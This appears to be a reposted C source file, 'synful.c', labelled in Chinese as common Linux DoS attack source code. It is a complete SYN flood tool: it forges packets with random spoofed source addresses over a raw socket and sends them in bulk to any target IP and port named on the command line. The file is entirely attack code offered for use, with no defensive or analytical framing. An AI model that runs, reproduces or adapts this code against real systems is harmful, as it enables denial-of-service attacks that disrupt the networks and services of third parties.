synful.c

LINUX下常见的DOS攻击源码

/* synful.c - SYN (SYN/ACK and ACK blow) written by \\StOrM\\ */

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <arpa/inet.h>
#include <linux/ip.h>
#include <linux/tcp.h>

void dosynpacket(unsigned int, unsigned int, unsigned short, unsigned short);
unsigned short in_cksum(unsigned short *, int);
unsigned int host2ip(char *);

main(int argc, char **argv)
{
   unsigned int srchost;
   char tmpsrchost[12];
   int i,s1,s2,s3,s4;
   unsigned int dsthost;
   unsigned short port=80;
   unsigned short random_port;
   unsigned int number=1000;  
   printf("synful [It's so synful to send those spoofed SYN's]\n");
   printf("Hacked out by \\\\StOrM\\\\\n\n");
   if(argc < 2)
   {
      printf("syntax: synful targetIP\n", argv[0]);
      exit(0);
   }
   initrand();
   dsthost = host2ip(argv[1]);
   if(argc >= 3) port = atoi(argv[2]);
   if(argc >= 4) number = atoi(argv[3]);
   if(port == 0) port = 80;
   if(number == 0) number = 1000;
   printf("Destination  : %s\n",argv[1]);
   printf("Port         : %u\n",port);
   printf("NumberOfTimes: %d\n\n", number);   
   for(i=0;i < number;i++)
   {
      s1 = 1+(int) (255.0*rand()/(RAND_MAX+1.0));      
      s2 = 1+(int) (255.0*rand()/(RAND_MAX+1.0));      
      s3 = 1+(int) (255.0*rand()/(RAND_MAX+1.0));      
      s4 = 1+(int) (255.0*rand()/(RAND_MAX+1.0));      
      random_port = 1+(int) (10000.0*rand()/(RAND_MAX+1.0));
      sprintf(tmpsrchost,"%d.%d.%d.%d",s1,s2,s3,s4);
      printf("Being Synful to %s at port %u from %s port %u\n", argv[1], port, tmpsrchost, random_port);
      srchost = host2ip(tmpsrchost);
      dosynpacket(srchost, dsthost, port, random_port);
   }
}

void dosynpacket(unsigned int source_addr, unsigned int dest_addr, unsigned short dest_port, unsigned short ran_port) {
   struct send_tcp
   {
      struct iphdr ip;
      struct tcphdr tcp;
   } send_tcp;
   struct pseudo_header
   {
      unsigned int source_address;
      unsigned int dest_address;
      unsigned char placeholder;
      unsigned char protocol;
      unsigned short tcp_length;
      struct tcphdr tcp;
   } pseudo_header;
   int tcp_socket;
   struct sockaddr_in sin;
   int sinlen;
            
   /* form ip packet */
   send_tcp.ip.ihl = 5;
   send_tcp.ip.version = 4;
   send_tcp.ip.tos = 0;
   send_tcp.ip.tot_len = htons(40);
   send_tcp.ip.id = ran_port;
   send_tcp.ip.frag_off = 0;
   send_tcp.ip.ttl = 255;
   send_tcp.ip.protocol = IPPROTO_TCP;
   send_tcp.ip.check = 0;
   send_tcp.ip.saddr = source_addr;
   send_tcp.ip.daddr = dest_addr;
   
   /* form tcp packet */
   send_tcp.tcp.source = ran_port;
   send_tcp.tcp.dest = htons(dest_port);
   send_tcp.tcp.seq = ran_port;   
   send_tcp.tcp.ack_seq = 0;
   send_tcp.tcp.res1 = 0;
   send_tcp.tcp.doff = 5;
   send_tcp.tcp.fin = 0;
   send_tcp.tcp.syn = 1;
   send_tcp.tcp.rst = 0;
   send_tcp.tcp.psh = 0;
   send_tcp.tcp.ack = 0;
   send_tcp.tcp.urg = 0;
   send_tcp.tcp.res2 = 0;
   send_tcp.tcp.window = htons(512);
   send_tcp.tcp.check = 0;
   send_tcp.tcp.urg_ptr = 0;
   
   /* setup the sin struct */
   sin.sin_family = AF_INET;
   sin.sin_port = send_tcp.tcp.source;
   sin.sin_addr.s_addr = send_tcp.ip.daddr;   
   
   /* (try to) open the socket */
   tcp_socket = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
   if(tcp_socket < 0)
   {
      perror("socket");
      exit(1);
   }
   
      /* set fields that need to be changed */
      send_tcp.tcp.source++;
      send_tcp.ip.id++;
      send_tcp.tcp.seq++;
      send_tcp.tcp.check = 0;
      send_tcp.ip.check = 0;
      
      /* calculate the ip checksum */
      send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);

      /* set the pseudo header fields */
      pseudo_header.source_address = send_tcp.ip.saddr;
      pseudo_header.dest_address = send_tcp.ip.daddr;
      pseudo_header.placeholder = 0;
      pseudo_header.protocol = IPPROTO_TCP;
      pseudo_header.tcp_length = htons(20);
      bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
      send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32);
      sinlen = sizeof(sin);
      sendto(tcp_socket, &send_tcp, 40, 0, (struct sockaddr *)&sin, sinlen);
   close(tcp_socket);
}

unsigned short in_cksum(unsigned short *ptr, int nbytes)
{
	register long		sum;		/* assumes long == 32 bits */
	u_short			oddbyte;
	register u_short	answer;		/* assumes u_short == 16 bits */

	/*
	 * Our algorithm is simple, using a 32-bit accumulator (sum),
	 * we add sequential 16-bit words to it, and at the end, fold back
	 * all the carry bits from the top 16 bits into the lower 16 bits.
	 */

	sum = 0;
	while (nbytes > 1)  {
		sum += *ptr++;
		nbytes -= 2;
	}

				/* mop up an odd byte, if necessary */
	if (nbytes == 1) {
		oddbyte = 0;		/* make sure top half is zero */
		*((u_char *) &oddbyte) = *(u_char *)ptr;   /* one byte only */
		sum += oddbyte;
	}

	/*
	 * Add back carry outs from top 16 bits to low 16 bits.
	 */

	sum  = (sum >> 16) + (sum & 0xffff);	/* add high-16 to low-16 */
	sum += (sum >> 16);			/* add carry */
	answer = ~sum;		/* ones-complement, then truncate to 16 bits */
	return(answer);
}

unsigned int host2ip(char *hostname)
{
   static struct in_addr i;
   struct hostent *h;
   i.s_addr = inet_addr(hostname);
   if(i.s_addr == -1)
   {
      h = gethostbyname(hostname);
      if(h == NULL)
      {
         fprintf(stderr, "cant find %s!\n", hostname);
         exit(0);
      }
      bcopy(h->h_addr, (char *)&i.s_addr, h->h_length);
   }
   return i.s_addr;
}

void initrand(void)
{
  struct timeval tv;
 
  gettimeofday(&tv, (struct timezone *) NULL);
  srand(tv.tv_usec);
}